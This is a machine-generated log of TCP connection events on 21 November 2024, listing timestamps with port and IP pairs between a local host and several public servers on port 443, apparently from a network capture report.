                                                                                                                                                                        Nov 21, 2024 10:38:02.454602957 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.454765081 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.454927921 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.454943895 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.506745100 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.506995916 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:02.507040024 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.507987976 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.508074045 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:02.509154081 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:02.509221077 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.548944950 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:02.548969984 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.596015930 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:02.608876944 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.609350920 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.609384060 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.609966040 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.609973907 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.831166029 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.831603050 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.831614971 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:02.832089901 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:02.832096100 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.053112984 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.053878069 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.054004908 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.054013014 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.054076910 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.054152966 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.054172039 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.054210901 CET49837443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.054219007 CET4434983713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.056763887 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.056797028 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.056864977 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.057038069 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.057049990 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.107971907 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.108063936 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.109920025 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.109962940 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.110306025 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.146301985 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.187361002 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.209399939 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.210017920 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.210046053 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.210453033 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.210458040 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.293047905 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.296204090 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.296277046 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.296343088 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.296343088 CET49840443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.296384096 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.296411991 CET4434984013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.299591064 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.299675941 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.299978971 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.301130056 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.301157951 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.643452883 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.643527031 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.643615961 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.651767969 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.651784897 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.651798964 CET49842443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.651804924 CET4434984213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.658828974 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.658895016 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.659044981 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.660192013 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.660229921 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.660356045 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.660439014 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.660466909 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.660481930 CET49843443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.660490036 CET44349843184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.660876036 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.660888910 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.771400928 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.815421104 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.832716942 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.832724094 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.833339930 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:03.833344936 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.846745968 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.846776962 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:03.846905947 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.847285032 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:03.847296000 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.093674898 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.093725920 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.093796015 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.094327927 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.094345093 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.112586021 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.112628937 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.112680912 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.112883091 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:04.112891912 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.216417074 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.219748974 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.219846964 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.221774101 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.221792936 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.221839905 CET49844443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.221848011 CET4434984413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.224999905 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.225039959 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.225478888 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.225672007 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.225687027 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.310461044 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.311068058 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.311101913 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.311950922 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.311969995 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.762435913 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.765551090 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.765603065 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.765686989 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.905531883 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.905531883 CET49845443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.905572891 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.905590057 CET4434984513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.911658049 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.915189028 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.915211916 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.915612936 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.915618896 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.919511080 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.919545889 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:04.919672966 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.919867039 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:04.919876099 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.154112101 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.154618979 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.154656887 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.155080080 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.155086994 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.292450905 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.292519093 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.293895006 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.293904066 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.294121981 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.295253992 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.339333057 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.366333008 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.366415977 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.366539955 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.366663933 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.366686106 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.366697073 CET49846443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.366704941 CET4434984613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.369412899 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.369456053 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.369524956 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.369713068 CET49857443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.369724989 CET4434985713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.458162069 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.458659887 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.458684921 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.459170103 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.459178925 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.611541986 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.611619949 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.611766100 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.611875057 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.611901999 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.611917973 CET49847443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.611926079 CET4434984713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.615490913 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.615521908 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.615596056 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.615739107 CET49858443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.615742922 CET4434985813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.842355967 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.842432022 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.842515945 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.843194008 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.843194008 CET49852443192.168.2.6184.28.90.27
                                                                                                                                                                        Nov 21, 2024 10:38:05.843211889 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.843223095 CET44349852184.28.90.27192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.881617069 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.881889105 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.881937027 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.882880926 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.882950068 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.883991003 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.884068966 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.884205103 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.884223938 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.901458025 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.902731895 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.902935028 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.902954102 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.904681921 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.904835939 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.904951096 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.904951096 CET49848443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.904969931 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.904983997 CET4434984813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.905405045 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.905464888 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.907124043 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.907269001 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.907460928 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.907465935 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.909925938 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.909956932 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.910051107 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.910171986 CET49859443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.910185099 CET4434985913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.926645994 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:05.950064898 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.950531960 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.950551987 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.950978041 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:05.950985909 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:05.956882954 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.385127068 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.387953043 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.388035059 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.388052940 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.388094902 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.388158083 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.388164997 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.388209105 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.388223886 CET49855443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.388240099 CET4434985513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.392085075 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.392122030 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.392211914 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.392406940 CET49861443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.392422915 CET4434986113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396209955 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396234035 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396270037 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396282911 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396284103 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.396295071 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396303892 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.396328926 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.396353006 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.399908066 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.399926901 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.399934053 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.399965048 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.399991989 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.399992943 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.400013924 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.400029898 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.400053978 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.587208033 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.587235928 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.587308884 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.587337971 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.587383986 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.600378036 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.600403070 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.600441933 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.600460052 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.600475073 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.600493908 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.634900093 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.634949923 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.634984970 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.634999037 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.635045052 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.635063887 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.650796890 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.650857925 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.650882006 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.650949955 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.650974989 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.650993109 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.667598963 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.667673111 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.667684078 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.667696953 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.667752028 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.668100119 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.668111086 CET4434985313.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.668122053 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.668183088 CET49853443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.768976927 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.769001007 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.769036055 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.769054890 CET4434985413.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.769082069 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.769088984 CET49854443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:06.774256945 CET4434985613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:06.774729967 CET49856443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:06.774744034 CET4434985613.107.246.60192.168.2.6
